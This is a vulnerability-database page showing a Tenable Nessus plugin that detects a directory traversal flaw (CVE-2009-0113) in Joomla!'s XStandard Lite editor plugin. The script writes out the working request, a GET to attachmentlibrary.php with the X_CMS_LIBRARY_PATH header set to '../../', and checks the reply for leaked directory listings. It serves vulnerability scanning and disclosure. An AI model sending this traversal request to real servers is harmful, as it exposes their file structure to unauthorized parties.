Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2009-2024 Tenable Network Security, Inc.JOOMLA_X_CMS_LIBRARY_PATH_TRAVERSAL.NASL
HistoryJan 08, 2009 - 12:00 a.m.

XStandard Lite Plugin for Joomla! X_CMS_LIBRARY_PATH Header Directory Traversal

2009-01-0800:00:00
This script is Copyright (C) 2009-2024 Tenable Network Security, Inc.
www.tenable.com
51

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.4 Medium

AI Score

Confidence

Low

0.031 Low

EPSS

Percentile

91.1%

JSON

The version of Joomla! running on the remote host is distributed with a WYSIWYG editor plugin known as XStandard Lite. This plugin is affected by an information disclosure vulnerability in the attachmentlibrary.php script due to improper sanitization of user-supplied input to the X_CMS_LIBRARY_PATH request header before returning a listing of directories and certain types of files (txt, zip, pdf, doc, rtf, tar, ppt, xls, xml, xsl, xslt, swf, gif, jpeg, jpg, png, and bmp by default). Regardless of whether this plugin has been configured for use with the Joomla! installation, an unauthenticated, remote attacker can exploit this vulnerability, via a specially crafted directory traversal sequence, to disclose the directory trees on the remote host, subject to the privileges of the web server user ID.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(35321);
  script_version("1.22");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");

  script_cve_id("CVE-2009-0113");
  script_bugtraq_id(33143);
  script_xref(name:"EDB-ID", value:"7691");
  script_xref(name:"SECUNIA", value:"33377");

  script_name(english:"XStandard Lite Plugin for Joomla! X_CMS_LIBRARY_PATH Header Directory Traversal");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
an information disclosure vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Joomla! running on the remote host is distributed with
a WYSIWYG editor plugin known as XStandard Lite. This plugin is
affected by an information disclosure vulnerability in the
attachmentlibrary.php script due to improper sanitization of
user-supplied input to the X_CMS_LIBRARY_PATH request header before
returning a listing of directories and certain types of files (txt,
zip, pdf, doc, rtf, tar, ppt, xls, xml, xsl, xslt, swf, gif, jpeg,
jpg, png, and bmp by default). Regardless of whether this plugin has
been configured for use with the Joomla! installation, an
unauthenticated, remote attacker can exploit this vulnerability, via a
specially crafted directory traversal sequence, to disclose the
directory trees on the remote host, subject to the privileges of the
web server user ID.");
  # https://www.joomla.org/announcements/release-news/5226-joomla-159-security-release-now-available.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?11fb9abc");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Joomla! version 1.5.9 or later");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:U/RC:X");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_cwe_id(22);

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/01/07");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/01/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2009/01/08");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2009-2024 Tenable Network Security, Inc.");

  script_dependencies("joomla_detect.nasl");
  script_require_keys("installed_sw/Joomla!", "www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

# Target directory (relative to Joomla's 'images/stories' directory).
target_dir = "../../";

# Try to exploit the issue to get a list of directories under target_dir.
url ="/plugins/editors/xstandard/attachmentlibrary.php";

res = http_send_recv3(
  method      : "GET",
  port        : port,
  item        : dir + url,
  add_headers : make_array("X_CMS_LIBRARY_PATH", target_dir),
  exit_on_fail : TRUE
);

if (
  '<library><containers><container><objectName>' >< res[2] &&
  '<path>' +target_dir+ '</path>' >< res[2] ||
  (
    '/administrator/</baseURL>' >< res[2] ||
    '/components/</baseURL>' >< res[2]
  )
)
{
  info = res[2];
  info = ereg_replace(pattern:"><(/?library)>", replace:'>\n  <\\1>', string:info);
  info = ereg_replace(pattern:"><(/?containers)>", replace:'>\n  <\\1>', string:info);
  info = ereg_replace(pattern:"><(container)>", replace:'>\n    <\\1>', string:info);
  info = ereg_replace(pattern:"><(/container)>", replace:'>\n    <\\1>', string:info);
  info = ereg_replace(pattern:"><([^>]+)>", replace:'>\n      <\\1>', string:info);

  security_report_v4(
    port        : port,
    severity    : SECURITY_WARNING,
    generic     : TRUE,
    request     : make_list(http_last_sent_request()),
    output      : chomp(info)
  );
  exit(0);
}
else
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);
VendorProductVersionCPE
joomlajoomla%5c%21cpe:/a:joomla:joomla%5c%21

Related

checkpoint_advisories 1
prion 1
cve 1
cvelist 1
nvd 1
checkpoint_advisories
checkpoint_advisories
Update Protection against Joomla! "X_CMS_LIBRARY_PATH" Directory Traversal Vulnerability
2009-01-15 00:00:00
prion
prion
Directory traversal
2009-01-09 18:30:00
cve
cve
CVE-2009-0113
2009-01-09 18:30:03
cvelist
cvelist
CVE-2009-0113
2009-01-09 18:00:00
nvd
nvd
CVE-2009-0113
2009-01-09 18:30:03

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.4 Medium

AI Score

Confidence

Low

0.031 Low

EPSS

Percentile

91.1%

JSON
Related for JOOMLA_X_CMS_LIBRARY_PATH_TRAVERSAL.NASL
checkpoint_advisories1prion1cve1cvelist1nvd1